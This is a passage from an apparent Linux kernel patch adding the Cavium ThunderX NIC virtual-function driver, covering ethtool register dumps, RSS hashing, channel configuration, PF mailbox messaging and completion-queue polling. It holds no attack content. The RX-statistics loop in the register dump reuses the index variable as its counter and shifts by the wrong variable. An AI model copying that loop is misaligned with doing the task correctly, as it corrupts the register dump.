registers */ + for (mbox = 0; mbox < 
NIC_PF_VF_MAILBOX_SIZE; mbox++) + p[i++] = nicvf_reg_read(nic, + NIC_VF_PF_MAILBOX_0_1 | (mbox << 3)); + + p[i++] = nicvf_reg_read(nic, NIC_VF_INT); + p[i++] = nicvf_reg_read(nic, NIC_VF_INT_W1S); + p[i++] = nicvf_reg_read(nic, NIC_VF_ENA_W1C); + p[i++] = nicvf_reg_read(nic, NIC_VF_ENA_W1S); + p[i++] = nicvf_reg_read(nic, NIC_VNIC_RSS_CFG); + + for (key = 0; key < RSS_HASH_KEY_SIZE; key++) + p[i++] = nicvf_reg_read(nic, NIC_VNIC_RSS_KEY_0_4 | (key << 3)); + + /* Tx/Rx statistics */ + for (stat = 0; stat < TX_STATS_ENUM_LAST; stat++) + p[i++] = nicvf_reg_read(nic, + NIC_VNIC_TX_STAT_0_4 | (stat << 3)); + + for (i = 0; i < RX_STATS_ENUM_LAST; i++) + p[i++] = nicvf_reg_read(nic, + NIC_VNIC_RX_STAT_0_13 | (stat << 3)); + + p[i++] = nicvf_reg_read(nic, NIC_QSET_RQ_GEN_CFG); + + /* All completion queue's registers */ + for (q = 0; q < MAX_CMP_QUEUES_PER_QS; q++) { + p[i++] = nicvf_queue_reg_read(nic, NIC_QSET_CQ_0_7_CFG, q); + p[i++] = nicvf_queue_reg_read(nic, NIC_QSET_CQ_0_7_CFG2, q); + p[i++] = nicvf_queue_reg_read(nic, NIC_QSET_CQ_0_7_THRESH, q); + p[i++] = nicvf_queue_reg_read(nic, NIC_QSET_CQ_0_7_BASE, q); + p[i++] = nicvf_queue_reg_read(nic, NIC_QSET_CQ_0_7_HEAD, q); + p[i++] = nicvf_queue_reg_read(nic, NIC_QSET_CQ_0_7_TAIL, q); + p[i++] = nicvf_queue_reg_read(nic, NIC_QSET_CQ_0_7_DOOR, q); + p[i++] = nicvf_queue_reg_read(nic, NIC_QSET_CQ_0_7_STATUS, q); + p[i++] = nicvf_queue_reg_read(nic, NIC_QSET_CQ_0_7_STATUS2, q); + p[i++] = nicvf_queue_reg_read(nic, NIC_QSET_CQ_0_7_DEBUG, q); + } + + /* All receive queue's registers */ + for (q = 0; q < MAX_RCV_QUEUES_PER_QS; q++) { + p[i++] = nicvf_queue_reg_read(nic, NIC_QSET_RQ_0_7_CFG, q); + p[i++] = nicvf_queue_reg_read(nic, + NIC_QSET_RQ_0_7_STAT_0_1, q); + reg_offset = NIC_QSET_RQ_0_7_STAT_0_1 | (1 << 3); + p[i++] = nicvf_queue_reg_read(nic, reg_offset, q); + } + + for (q = 0; q < MAX_SND_QUEUES_PER_QS; q++) { + p[i++] = nicvf_queue_reg_read(nic, NIC_QSET_SQ_0_7_CFG, q); + p[i++] = nicvf_queue_reg_read(nic, NIC_QSET_SQ_0_7_THRESH, q); + p[i++] = nicvf_queue_reg_read(nic, NIC_QSET_SQ_0_7_BASE, q); + p[i++] = nicvf_queue_reg_read(nic, NIC_QSET_SQ_0_7_HEAD, q); + p[i++] = nicvf_queue_reg_read(nic, NIC_QSET_SQ_0_7_TAIL, q); + p[i++] = nicvf_queue_reg_read(nic, NIC_QSET_SQ_0_7_DOOR, q); + p[i++] = nicvf_queue_reg_read(nic, NIC_QSET_SQ_0_7_STATUS, q); + p[i++] = nicvf_queue_reg_read(nic, NIC_QSET_SQ_0_7_DEBUG, q); + p[i++] = nicvf_queue_reg_read(nic, NIC_QSET_SQ_0_7_CNM_CHG, q); + p[i++] = nicvf_queue_reg_read(nic, NIC_QSET_SQ_0_7_STAT_0_1, q); + reg_offset = NIC_QSET_SQ_0_7_STAT_0_1 | (1 << 3); + p[i++] = nicvf_queue_reg_read(nic, reg_offset, q); + } + + for (q = 0; q < MAX_RCV_BUF_DESC_RINGS_PER_QS; q++) { + p[i++] = nicvf_queue_reg_read(nic, NIC_QSET_RBDR_0_1_CFG, q); + p[i++] = nicvf_queue_reg_read(nic, NIC_QSET_RBDR_0_1_THRESH, q); + p[i++] = nicvf_queue_reg_read(nic, NIC_QSET_RBDR_0_1_BASE, q); + p[i++] = nicvf_queue_reg_read(nic, NIC_QSET_RBDR_0_1_HEAD, q); + p[i++] = nicvf_queue_reg_read(nic, NIC_QSET_RBDR_0_1_TAIL, q); + p[i++] = nicvf_queue_reg_read(nic, NIC_QSET_RBDR_0_1_DOOR, q); + p[i++] = nicvf_queue_reg_read(nic, + NIC_QSET_RBDR_0_1_STATUS0, q); + p[i++] = nicvf_queue_reg_read(nic, + NIC_QSET_RBDR_0_1_STATUS1, q); + reg_offset = NIC_QSET_RBDR_0_1_PREFETCH_STATUS; + p[i++] = nicvf_queue_reg_read(nic, reg_offset, q); + } +} + +static int nicvf_get_coalesce(struct net_device *netdev, + struct ethtool_coalesce *cmd) +{ + struct nicvf *nic = netdev_priv(netdev); + + cmd->rx_coalesce_usecs = nic->cq_coalesce_usecs; + return 0; +} + +static 
void nicvf_get_ringparam(struct net_device *netdev, + struct ethtool_ringparam *ring) +{ + struct nicvf *nic = netdev_priv(netdev); + struct queue_set *qs = nic->qs; + + ring->rx_max_pending = MAX_RCV_BUF_COUNT; + ring->rx_pending = qs->rbdr_len; + ring->tx_max_pending = MAX_SND_QUEUE_LEN; + ring->tx_pending = qs->sq_len; +} + +static int nicvf_get_rss_hash_opts(struct nicvf *nic, + struct ethtool_rxnfc *info) +{ + info->data = 0; + + switch (info->flow_type) { + case TCP_V4_FLOW: + case TCP_V6_FLOW: + case UDP_V4_FLOW: + case UDP_V6_FLOW: + case SCTP_V4_FLOW: + case SCTP_V6_FLOW: + info->data |= RXH_L4_B_0_1 | RXH_L4_B_2_3; + case IPV4_FLOW: + case IPV6_FLOW: + info->data |= RXH_IP_SRC | RXH_IP_DST; + break; + default: + return -EINVAL; + } + + return 0; +} + +static int nicvf_get_rxnfc(struct net_device *dev, + struct ethtool_rxnfc *info, u32 *rules) +{ + struct nicvf *nic = netdev_priv(dev); + int ret = -EOPNOTSUPP; + + switch (info->cmd) { + case ETHTOOL_GRXRINGS: + info->data = nic->qs->rq_cnt; + ret = 0; + break; + case ETHTOOL_GRXFH: + return nicvf_get_rss_hash_opts(nic, info); + default: + break; + } + return ret; +} + +static int nicvf_set_rss_hash_opts(struct nicvf *nic, + struct ethtool_rxnfc *info) +{ + struct nicvf_rss_info *rss = &nic->rss_info; + u64 rss_cfg = nicvf_reg_read(nic, NIC_VNIC_RSS_CFG); + + if (!rss->enable) + netdev_err(nic->netdev, + "RSS is disabled, hash cannot be set\n"); + + netdev_info(nic->netdev, "Set RSS flow type = %d, data = %lld\n", + info->flow_type, info->data); + + if (!(info->data & RXH_IP_SRC) || !(info->data & RXH_IP_DST)) + return -EINVAL; + + switch (info->flow_type) { + case TCP_V4_FLOW: + case TCP_V6_FLOW: + switch (info->data & (RXH_L4_B_0_1 | RXH_L4_B_2_3)) { + case 0: + rss_cfg &= ~(1ULL << RSS_HASH_TCP); + break; + case (RXH_L4_B_0_1 | RXH_L4_B_2_3): + rss_cfg |= (1ULL << RSS_HASH_TCP); + break; + default: + return -EINVAL; + } + break; + case UDP_V4_FLOW: + case UDP_V6_FLOW: + switch (info->data & (RXH_L4_B_0_1 | RXH_L4_B_2_3)) { + case 0: + rss_cfg &= ~(1ULL << RSS_HASH_UDP); + break; + case (RXH_L4_B_0_1 | RXH_L4_B_2_3): + rss_cfg |= (1ULL << RSS_HASH_UDP); + break; + default: + return -EINVAL; + } + break; + case SCTP_V4_FLOW: + case SCTP_V6_FLOW: + switch (info->data & (RXH_L4_B_0_1 | RXH_L4_B_2_3)) { + case 0: + rss_cfg &= ~(1ULL << RSS_HASH_L4ETC); + break; + case (RXH_L4_B_0_1 | RXH_L4_B_2_3): + rss_cfg |= (1ULL << RSS_HASH_L4ETC); + break; + default: + return -EINVAL; + } + break; + case IPV4_FLOW: + case IPV6_FLOW: + rss_cfg = RSS_HASH_IP; + break; + default: + return -EINVAL; + } + + nicvf_reg_write(nic, NIC_VNIC_RSS_CFG, rss_cfg); + return 0; +} + +static int nicvf_set_rxnfc(struct net_device *dev, struct ethtool_rxnfc *info) +{ + struct nicvf *nic = netdev_priv(dev); + + switch (info->cmd) { + case ETHTOOL_SRXFH: + return nicvf_set_rss_hash_opts(nic, info); + default: + break; + } + return -EOPNOTSUPP; +} + +static u32 nicvf_get_rxfh_key_size(struct net_device *netdev) +{ + return RSS_HASH_KEY_SIZE * sizeof(u64); +} + +static u32 nicvf_get_rxfh_indir_size(struct net_device *dev) +{ + struct nicvf *nic = netdev_priv(dev); + + return nic->rss_info.rss_size; +} + +static int nicvf_get_rxfh(struct net_device *dev, u32 *indir, u8 *hkey, + u8 *hfunc) +{ + struct nicvf *nic = netdev_priv(dev); + struct nicvf_rss_info *rss = &nic->rss_info; + int idx; + + if (indir) { + for (idx = 0; idx < rss->rss_size; idx++) + indir[idx] = rss->ind_tbl[idx]; + } + + if (hkey) + memcpy(hkey, rss->key, RSS_HASH_KEY_SIZE * sizeof(u64)); + + if 
(hfunc) + *hfunc = ETH_RSS_HASH_TOP; + + return 0; +} + +static int nicvf_set_rxfh(struct net_device *dev, const u32 *indir, + const u8 *hkey, u8 hfunc) +{ + struct nicvf *nic = netdev_priv(dev); + struct nicvf_rss_info *rss = &nic->rss_info; + int idx; + + if ((nic->qs->rq_cnt <= 1) || (nic->cpi_alg != CPI_ALG_NONE)) { + rss->enable = false; + rss->hash_bits = 0; + return -EIO; + } + + /* We do not allow change in unsupported parameters */ + if (hkey || + (hfunc != ETH_RSS_HASH_NO_CHANGE && hfunc != ETH_RSS_HASH_TOP)) + return -EOPNOTSUPP; + + rss->enable = true; + if (indir) { + for (idx = 0; idx < rss->rss_size; idx++) + rss->ind_tbl[idx] = indir[idx]; + } + + if (hkey) { + memcpy(rss->key, hkey, RSS_HASH_KEY_SIZE * sizeof(u64)); + nicvf_set_rss_key(nic); + } + + nicvf_config_rss(nic); + return 0; +} + +/* Get no of queues device supports and current queue count */ +static void nicvf_get_channels(struct net_device *dev, + struct ethtool_channels *channel) +{ + struct nicvf *nic = netdev_priv(dev); + + memset(channel, 0, sizeof(*channel)); + + channel->max_rx = MAX_RCV_QUEUES_PER_QS; + channel->max_tx = MAX_SND_QUEUES_PER_QS; + + channel->rx_count = nic->qs->rq_cnt; + channel->tx_count = nic->qs->sq_cnt; +} + +/* Set no of Tx, Rx queues to be used */ +static int nicvf_set_channels(struct net_device *dev, + struct ethtool_channels *channel) +{ + struct nicvf *nic = netdev_priv(dev); + int err = 0; + + if (!channel->rx_count || !channel->tx_count) + return -EINVAL; + if (channel->rx_count > MAX_RCV_QUEUES_PER_QS) + return -EINVAL; + if (channel->tx_count > MAX_SND_QUEUES_PER_QS) + return -EINVAL; + + nic->qs->rq_cnt = channel->rx_count; + nic->qs->sq_cnt = channel->tx_count; + nic->qs->cq_cnt = max(nic->qs->rq_cnt, nic->qs->sq_cnt); + + err = nicvf_set_real_num_queues(dev, nic->qs->sq_cnt, nic->qs->rq_cnt); + if (err) + return err; + + if (!netif_running(dev)) + return err; + + nicvf_stop(dev); + nicvf_open(dev); + netdev_info(dev, "Setting num Tx rings to %d, Rx rings to %d success\n", + nic->qs->sq_cnt, nic->qs->rq_cnt); + + return err; +} + +static const struct ethtool_ops nicvf_ethtool_ops = { + .get_settings = nicvf_get_settings, + .get_link = ethtool_op_get_link, + .get_drvinfo = nicvf_get_drvinfo, + .get_msglevel = nicvf_get_msglevel, + .set_msglevel = nicvf_set_msglevel, + .get_strings = nicvf_get_strings, + .get_sset_count = nicvf_get_sset_count, + .get_ethtool_stats = nicvf_get_ethtool_stats, + .get_regs_len = nicvf_get_regs_len, + .get_regs = nicvf_get_regs, + .get_coalesce = nicvf_get_coalesce, + .get_ringparam = nicvf_get_ringparam, + .get_rxnfc = nicvf_get_rxnfc, + .set_rxnfc = nicvf_set_rxnfc, + .get_rxfh_key_size = nicvf_get_rxfh_key_size, + .get_rxfh_indir_size = nicvf_get_rxfh_indir_size, + .get_rxfh = nicvf_get_rxfh, + .set_rxfh = nicvf_set_rxfh, + .get_channels = nicvf_get_channels, + .set_channels = nicvf_set_channels, + .get_ts_info = ethtool_op_get_ts_info, +}; + +void nicvf_set_ethtool_ops(struct net_device *netdev) +{ + netdev->ethtool_ops = &nicvf_ethtool_ops; +} diff --git a/drivers/net/ethernet/cavium/thunder/nicvf_main.c b/drivers/net/ethernet/cavium/thunder/nicvf_main.c new file mode 100644 index 000000000000..abd446e6155b --- /dev/null +++ b/drivers/net/ethernet/cavium/thunder/nicvf_main.c @@ -0,0 +1,1332 @@ +/* + * Copyright (C) 2015 Cavium, Inc. + * + * This program is free software; you can redistribute it and/or modify it + * under the terms of version 2 of the GNU General Public License + * as published by the Free Software Foundation. 
+ */ + +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#include "nic_reg.h" +#include "nic.h" +#include "nicvf_queues.h" +#include "thunder_bgx.h" + +#define DRV_NAME "thunder-nicvf" +#define DRV_VERSION "1.0" + +/* Supported devices */ +static const struct pci_device_id nicvf_id_table[] = { + { PCI_DEVICE_SUB(PCI_VENDOR_ID_CAVIUM, + PCI_DEVICE_ID_THUNDER_NIC_VF, + PCI_VENDOR_ID_CAVIUM, 0xA11E) }, + { PCI_DEVICE_SUB(PCI_VENDOR_ID_CAVIUM, + PCI_DEVICE_ID_THUNDER_PASS1_NIC_VF, + PCI_VENDOR_ID_CAVIUM, 0xA11E) }, + { 0, } /* end of table */ +}; + +MODULE_AUTHOR("Sunil Goutham"); +MODULE_DESCRIPTION("Cavium Thunder NIC Virtual Function Driver"); +MODULE_LICENSE("GPL v2"); +MODULE_VERSION(DRV_VERSION); +MODULE_DEVICE_TABLE(pci, nicvf_id_table); + +static int debug = 0x00; +module_param(debug, int, 0644); +MODULE_PARM_DESC(debug, "Debug message level bitmap"); + +static int cpi_alg = CPI_ALG_NONE; +module_param(cpi_alg, int, S_IRUGO); +MODULE_PARM_DESC(cpi_alg, + "PFC algorithm (0=none, 1=VLAN, 2=VLAN16, 3=IP Diffserv)"); + +static int nicvf_enable_msix(struct nicvf *nic); +static netdev_tx_t nicvf_xmit(struct sk_buff *skb, struct net_device *netdev); +static void nicvf_read_bgx_stats(struct nicvf *nic, struct bgx_stats_msg *bgx); + +static inline void nicvf_set_rx_frame_cnt(struct nicvf *nic, + struct sk_buff *skb) +{ + if (skb->len <= 64) + nic->drv_stats.rx_frames_64++; + else if (skb->len <= 127) + nic->drv_stats.rx_frames_127++; + else if (skb->len <= 255) + nic->drv_stats.rx_frames_255++; + else if (skb->len <= 511) + nic->drv_stats.rx_frames_511++; + else if (skb->len <= 1023) + nic->drv_stats.rx_frames_1023++; + else if (skb->len <= 1518) + nic->drv_stats.rx_frames_1518++; + else + nic->drv_stats.rx_frames_jumbo++; +} + +/* The Cavium ThunderX network controller can *only* be found in SoCs + * containing the ThunderX ARM64 CPU implementation. All accesses to the device + * registers on this platform are implicitly strongly ordered with respect + * to memory accesses. So writeq_relaxed() and readq_relaxed() are safe to use + * with no memory barriers in this driver. The readq()/writeq() functions add + * explicit ordering operation which in this case are redundant, and only + * add overhead. 
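[Editorial note, not part of the patch] The VF reaches all of its per-queue registers through a single BAR, with the queue index folded into the address; NIC_Q_NUM_SHIFT (18) from nic_reg.h is the shift the nicvf_queue_reg_write()/nicvf_queue_reg_read() helpers just below apply. A quick illustration with a hypothetical helper:

        /* Illustrative sketch: per-queue register addressing.  For example,
         * CQ2's doorbell sits at NIC_QSET_CQ_0_7_DOOR + (2 << NIC_Q_NUM_SHIFT)
         * = 0x010438 + 0x80000 = 0x090438 from the VF's BAR.
         */
        static inline u64 example_queue_reg_offset(u64 offset, u64 qidx)
        {
                return offset + (qidx << NIC_Q_NUM_SHIFT);
        }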
+ */ + +/* Register read/write APIs */ +void nicvf_reg_write(struct nicvf *nic, u64 offset, u64 val) +{ + writeq_relaxed(val, nic->reg_base + offset); +} + +u64 nicvf_reg_read(struct nicvf *nic, u64 offset) +{ + return readq_relaxed(nic->reg_base + offset); +} + +void nicvf_queue_reg_write(struct nicvf *nic, u64 offset, + u64 qidx, u64 val) +{ + void __iomem *addr = nic->reg_base + offset; + + writeq_relaxed(val, addr + (qidx << NIC_Q_NUM_SHIFT)); +} + +u64 nicvf_queue_reg_read(struct nicvf *nic, u64 offset, u64 qidx) +{ + void __iomem *addr = nic->reg_base + offset; + + return readq_relaxed(addr + (qidx << NIC_Q_NUM_SHIFT)); +} + +/* VF -> PF mailbox communication */ + +int nicvf_send_msg_to_pf(struct nicvf *nic, union nic_mbx *mbx) +{ + int timeout = NIC_MBOX_MSG_TIMEOUT; + int sleep = 10; + u64 *msg = (u64 *)mbx; + + nic->pf_acked = false; + nic->pf_nacked = false; + + nicvf_reg_write(nic, NIC_VF_PF_MAILBOX_0_1 + 0, msg[0]); + nicvf_reg_write(nic, NIC_VF_PF_MAILBOX_0_1 + 8, msg[1]); + + /* Wait for previous message to be acked, timeout 2sec */ + while (!nic->pf_acked) { + if (nic->pf_nacked) + return -EINVAL; + msleep(sleep); + if (nic->pf_acked) + break; + timeout -= sleep; + if (!timeout) { + netdev_err(nic->netdev, + "PF didn't ack to mbox msg %d from VF%d\n", + (mbx->msg.msg & 0xFF), nic->vf_id); + return -EBUSY; + } + } + return 0; +} + +/* Checks if VF is able to comminicate with PF +* and also gets the VNIC number this VF is associated to. +*/ +static int nicvf_check_pf_ready(struct nicvf *nic) +{ + int timeout = 5000, sleep = 20; + + nic->pf_ready_to_rcv_msg = false; + + nicvf_reg_write(nic, NIC_VF_PF_MAILBOX_0_1 + 0, + le64_to_cpu(NIC_MBOX_MSG_READY)); + nicvf_reg_write(nic, NIC_VF_PF_MAILBOX_0_1 + 8, 1ULL); + + while (!nic->pf_ready_to_rcv_msg) { + msleep(sleep); + if (nic->pf_ready_to_rcv_msg) + break; + timeout -= sleep; + if (!timeout) { + netdev_err(nic->netdev, + "PF didn't respond to READY msg\n"); + return 0; + } + } + return 1; +} + +static void nicvf_handle_mbx_intr(struct nicvf *nic) +{ + union nic_mbx mbx = {}; + u64 *mbx_data; + u64 mbx_addr; + int i; + + mbx_addr = NIC_VF_PF_MAILBOX_0_1; + mbx_data = (u64 *)&mbx; + + for (i = 0; i < NIC_PF_VF_MAILBOX_SIZE; i++) { + *mbx_data = nicvf_reg_read(nic, mbx_addr); + mbx_data++; + mbx_addr += sizeof(u64); + } + + netdev_dbg(nic->netdev, "Mbox message: msg: 0x%x\n", mbx.msg.msg); + switch (mbx.msg.msg) { + case NIC_MBOX_MSG_READY: + nic->pf_ready_to_rcv_msg = true; + nic->vf_id = mbx.nic_cfg.vf_id & 0x7F; + nic->tns_mode = mbx.nic_cfg.tns_mode & 0x7F; + nic->node = mbx.nic_cfg.node_id; + ether_addr_copy(nic->netdev->dev_addr, + (u8 *)&mbx.nic_cfg.mac_addr); + nic->link_up = false; + nic->duplex = 0; + nic->speed = 0; + break; + case NIC_MBOX_MSG_ACK: + nic->pf_acked = true; + break; + case NIC_MBOX_MSG_NACK: + nic->pf_nacked = true; + break; + case NIC_MBOX_MSG_RSS_SIZE: + nic->rss_info.rss_size = mbx.rss_size.ind_tbl_size; + nic->pf_acked = true; + break; + case NIC_MBOX_MSG_BGX_STATS: + nicvf_read_bgx_stats(nic, &mbx.bgx_stats); + nic->pf_acked = true; + nic->bgx_stats_acked = true; + break; + case NIC_MBOX_MSG_BGX_LINK_CHANGE: + nic->pf_acked = true; + nic->link_up = mbx.link_status.link_up; + nic->duplex = mbx.link_status.duplex; + nic->speed = mbx.link_status.speed; + if (nic->link_up) { + netdev_info(nic->netdev, "%s: Link is Up %d Mbps %s\n", + nic->netdev->name, nic->speed, + nic->duplex == DUPLEX_FULL ? 
+ "Full duplex" : "Half duplex"); + netif_carrier_on(nic->netdev); + netif_tx_wake_all_queues(nic->netdev); + } else { + netdev_info(nic->netdev, "%s: Link is Down\n", + nic->netdev->name); + netif_carrier_off(nic->netdev); + netif_tx_stop_all_queues(nic->netdev); + } + break; + default: + netdev_err(nic->netdev, + "Invalid message from PF, msg 0x%x\n", mbx.msg.msg); + break; + } + nicvf_clear_intr(nic, NICVF_INTR_MBOX, 0); +} + +static int nicvf_hw_set_mac_addr(struct nicvf *nic, struct net_device *netdev) +{ + union nic_mbx mbx = {}; + int i; + + mbx.mac.msg = NIC_MBOX_MSG_SET_MAC; + mbx.mac.vf_id = nic->vf_id; + for (i = 0; i < ETH_ALEN; i++) + mbx.mac.addr = (mbx.mac.addr << 8) | + netdev->dev_addr[i]; + + return nicvf_send_msg_to_pf(nic, &mbx); +} + +void nicvf_config_cpi(struct nicvf *nic) +{ + union nic_mbx mbx = {}; + + mbx.cpi_cfg.msg = NIC_MBOX_MSG_CPI_CFG; + mbx.cpi_cfg.vf_id = nic->vf_id; + mbx.cpi_cfg.cpi_alg = nic->cpi_alg; + mbx.cpi_cfg.rq_cnt = nic->qs->rq_cnt; + + nicvf_send_msg_to_pf(nic, &mbx); +} + +void nicvf_get_rss_size(struct nicvf *nic) +{ + union nic_mbx mbx = {}; + + mbx.rss_size.msg = NIC_MBOX_MSG_RSS_SIZE; + mbx.rss_size.vf_id = nic->vf_id; + nicvf_send_msg_to_pf(nic, &mbx); +} + +void nicvf_config_rss(struct nicvf *nic) +{ + union nic_mbx mbx = {}; + struct nicvf_rss_info *rss = &nic->rss_info; + int ind_tbl_len = rss->rss_size; + int i, nextq = 0; + + mbx.rss_cfg.vf_id = nic->vf_id; + mbx.rss_cfg.hash_bits = rss->hash_bits; + while (ind_tbl_len) { + mbx.rss_cfg.tbl_offset = nextq; + mbx.rss_cfg.tbl_len = min(ind_tbl_len, + RSS_IND_TBL_LEN_PER_MBX_MSG); + mbx.rss_cfg.msg = mbx.rss_cfg.tbl_offset ? + NIC_MBOX_MSG_RSS_CFG_CONT : NIC_MBOX_MSG_RSS_CFG; + + for (i = 0; i < mbx.rss_cfg.tbl_len; i++) + mbx.rss_cfg.ind_tbl[i] = rss->ind_tbl[nextq++]; + + nicvf_send_msg_to_pf(nic, &mbx); + + ind_tbl_len -= mbx.rss_cfg.tbl_len; + } +} + +void nicvf_set_rss_key(struct nicvf *nic) +{ + struct nicvf_rss_info *rss = &nic->rss_info; + u64 key_addr = NIC_VNIC_RSS_KEY_0_4; + int idx; + + for (idx = 0; idx < RSS_HASH_KEY_SIZE; idx++) { + nicvf_reg_write(nic, key_addr, rss->key[idx]); + key_addr += sizeof(u64); + } +} + +static int nicvf_rss_init(struct nicvf *nic) +{ + struct nicvf_rss_info *rss = &nic->rss_info; + int idx; + + nicvf_get_rss_size(nic); + + if ((nic->qs->rq_cnt <= 1) || (cpi_alg != CPI_ALG_NONE)) { + rss->enable = false; + rss->hash_bits = 0; + return 0; + } + + rss->enable = true; + + /* Using the HW reset value for now */ + rss->key[0] = 0xFEED0BADFEED0BAD; + rss->key[1] = 0xFEED0BADFEED0BAD; + rss->key[2] = 0xFEED0BADFEED0BAD; + rss->key[3] = 0xFEED0BADFEED0BAD; + rss->key[4] = 0xFEED0BADFEED0BAD; + + nicvf_set_rss_key(nic); + + rss->cfg = RSS_IP_HASH_ENA | RSS_TCP_HASH_ENA | RSS_UDP_HASH_ENA; + nicvf_reg_write(nic, NIC_VNIC_RSS_CFG, rss->cfg); + + rss->hash_bits = ilog2(rounddown_pow_of_two(rss->rss_size)); + + for (idx = 0; idx < rss->rss_size; idx++) + rss->ind_tbl[idx] = ethtool_rxfh_indir_default(idx, + nic->qs->rq_cnt); + nicvf_config_rss(nic); + return 1; +} + +int nicvf_set_real_num_queues(struct net_device *netdev, + int tx_queues, int rx_queues) +{ + int err = 0; + + err = netif_set_real_num_tx_queues(netdev, tx_queues); + if (err) { + netdev_err(netdev, + "Failed to set no of Tx queues: %d\n", tx_queues); + return err; + } + + err = netif_set_real_num_rx_queues(netdev, rx_queues); + if (err) + netdev_err(netdev, + "Failed to set no of Rx queues: %d\n", rx_queues); + return err; +} + +static int nicvf_init_resources(struct nicvf *nic) +{ + int err; 
+ u64 mbx_addr = NIC_VF_PF_MAILBOX_0_1; + + /* Enable Qset */ + nicvf_qset_config(nic, true); + + /* Initialize queues and HW for data transfer */ + err = nicvf_config_data_transfer(nic, true); + if (err) { + netdev_err(nic->netdev, + "Failed to alloc/config VF's QSet resources\n"); + return err; + } + + /* Send VF config done msg to PF */ + nicvf_reg_write(nic, mbx_addr, le64_to_cpu(NIC_MBOX_MSG_CFG_DONE)); + mbx_addr += (NIC_PF_VF_MAILBOX_SIZE - 1) * 8; + nicvf_reg_write(nic, mbx_addr, 1ULL); + + return 0; +} + +static void nicvf_snd_pkt_handler(struct net_device *netdev, + struct cmp_queue *cq, + struct cqe_send_t *cqe_tx, int cqe_type) +{ + struct sk_buff *skb = NULL; + struct nicvf *nic = netdev_priv(netdev); + struct snd_queue *sq; + struct sq_hdr_subdesc *hdr; + + sq = &nic->qs->sq[cqe_tx->sq_idx]; + + hdr = (struct sq_hdr_subdesc *)GET_SQ_DESC(sq, cqe_tx->sqe_ptr); + if (hdr->subdesc_type != SQ_DESC_TYPE_HEADER) + return; + + netdev_dbg(nic->netdev, + "%s Qset #%d SQ #%d SQ ptr #%d subdesc count %d\n", + __func__, cqe_tx->sq_qs, cqe_tx->sq_idx, + cqe_tx->sqe_ptr, hdr->subdesc_cnt); + + nicvf_put_sq_desc(sq, hdr->subdesc_cnt + 1); + nicvf_check_cqe_tx_errs(nic, cq, cqe_tx); + skb = (struct sk_buff *)sq->skbuff[cqe_tx->sqe_ptr]; + /* For TSO offloaded packets only one head SKB needs to be freed */ + if (skb) { + prefetch(skb); + dev_consume_skb_any(skb); + } +} + +static void nicvf_rcv_pkt_handler(struct net_device *netdev, + struct napi_struct *napi, + struct cmp_queue *cq, + struct cqe_rx_t *cqe_rx, int cqe_type) +{ + struct sk_buff *skb; + struct nicvf *nic = netdev_priv(netdev); + int err = 0; + + /* Check for errors */ + err = nicvf_check_cqe_rx_errs(nic, cq, cqe_rx); + if (err && !cqe_rx->rb_cnt) + return; + + skb = nicvf_get_rcv_skb(nic, cqe_rx); + if (!skb) { + netdev_dbg(nic->netdev, "Packet not received\n"); + return; + } + + if (netif_msg_pktdata(nic)) { + netdev_info(nic->netdev, "%s: skb 0x%p, len=%d\n", netdev->name, + skb, skb->len); + print_hex_dump(KERN_INFO, "", DUMP_PREFIX_OFFSET, 16, 1, + skb->data, skb->len, true); + } + + nicvf_set_rx_frame_cnt(nic, skb); + + skb_record_rx_queue(skb, cqe_rx->rq_idx); + if (netdev->hw_features & NETIF_F_RXCSUM) { + /* HW by default verifies TCP/UDP/SCTP checksums */ + skb->ip_summed = CHECKSUM_UNNECESSARY; + } else { + skb_checksum_none_assert(skb); + } + + skb->protocol = eth_type_trans(skb, netdev); + + if (napi && (netdev->features & NETIF_F_GRO)) + napi_gro_receive(napi, skb); + else + netif_receive_skb(skb); +} + +static int nicvf_cq_intr_handler(struct net_device *netdev, u8 cq_idx, + struct napi_struct *napi, int budget) +{ + int processed_cqe, work_done = 0; + int cqe_count, cqe_head; + struct nicvf *nic = netdev_priv(netdev); + struct queue_set *qs = nic->qs; + struct cmp_queue *cq = &qs->cq[cq_idx]; + struct cqe_rx_t *cq_desc; + + spin_lock_bh(&cq->lock); +loop: + processed_cqe = 0; + /* Get no of valid CQ entries to process */ + cqe_count = nicvf_queue_reg_read(nic, NIC_QSET_CQ_0_7_STATUS, cq_idx); + cqe_count &= CQ_CQE_COUNT; + if (!cqe_count) + goto done; + + /* Get head of the valid CQ entries */ + cqe_head = nicvf_queue_reg_read(nic, NIC_QSET_CQ_0_7_HEAD, cq_idx) >> 9; + cqe_head &= 0xFFFF; + + netdev_dbg(nic->netdev, "%s cqe_count %d cqe_head %d\n", + __func__, cqe_count, cqe_head); + while (processed_cqe < cqe_count) { + /* Get the CQ descriptor */ + cq_desc = (struct cqe_rx_t *)GET_CQ_DESC(cq, cqe_head); + cqe_head++; + cqe_head &= (cq->dmem.q_len - 1); + /* Initiate prefetch for next descriptor */ + 
prefetch((struct cqe_rx_t *)GET_CQ_DESC(cq, cqe_head)); + + if ((work_done >= budget) && napi && + (cq_desc->cqe_type != CQE_TYPE_SEND)) { + break; + } + + netdev_dbg(nic->netdev, "cq_desc->cqe_type %d\n", + cq_desc->cqe_type); + switch (cq_desc->cqe_type) { + case CQE_TYPE_RX: + nicvf_rcv_pkt_handler(netdev, napi, cq, + cq_desc, CQE_TYPE_RX); + work_done++; + break; + case CQE_TYPE_SEND: + nicvf_snd_pkt_handler(netdev, cq, + (void *)cq_desc, CQE_TYPE_SEND); + break; + case CQE_TYPE_INVALID: + case CQE_TYPE_RX_SPLIT: + case CQE_TYPE_RX_TCP: + case CQE_TYPE_SEND_PTP: + /* Ignore for now */ + break; + } + processed_cqe++; + } + netdev_dbg(nic->netdev, "%s processed_cqe %d work_done %d budget %d\n", + __func__, processed_cqe, work_done, budget); + + /* Ring doorbell to inform H/W to reuse processed CQEs */ + nicvf_queue_reg_write(nic, NIC_QSET_CQ_0_7_DOOR, + cq_idx, processed_cqe); + + if ((work_done < budget) && napi) + goto loop; + +done: + spin_unlock_bh(&cq->lock); + return work_done; +} + +static int nicvf_poll(struct napi_struct *napi, int budget) +{ + u64 cq_head; + int work_done = 0; + struct net_device *netdev = napi->dev; + struct nicvf *nic = netdev_priv(netdev); + struct nicvf_cq_poll *cq; + struct netdev_queue *txq; + + cq = container_of(napi, struct nicvf_cq_poll, napi); + work_done = nicvf_cq_intr_handler(netdev, cq->cq_idx, napi, budget); + + txq = netdev_get_tx_queue(netdev, cq->cq_idx); + if (netif_tx_queue_stopped(txq)) + netif_tx_wake_queue(txq); + + if (work_done < budget) { + /* Slow packet rate, exit polling */ + napi_complete(napi); + /* Re-enable 